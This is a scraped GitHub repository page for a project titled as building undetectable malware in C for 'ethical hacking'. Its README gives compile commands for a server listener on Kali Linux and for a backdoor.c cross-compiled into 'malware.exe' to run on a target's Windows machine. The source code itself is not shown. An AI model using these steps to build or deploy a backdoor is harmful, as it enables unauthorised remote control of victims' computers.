Skip to content

iakshaychauhan/Build-Undetectable-Malware-Using-C-Language-Ethical-Hacking

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 
 
 

Repository files navigation

1. Compile and Run the sever.c file in linux i.e Kali Linux 
	use the code given below to compile:

	gcc server.c -o server
	
2. Now compile backdoor.c in Kali Linus ny using Mingw32 
 
	use the code given below to compile:
	i686-w64-mingw32-gcc -o malware.exe backdoor.c -lwsock32 -lwininet
By using this code it would create a exe file that runs on target's windows machine 

And you are ready to rock! 

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages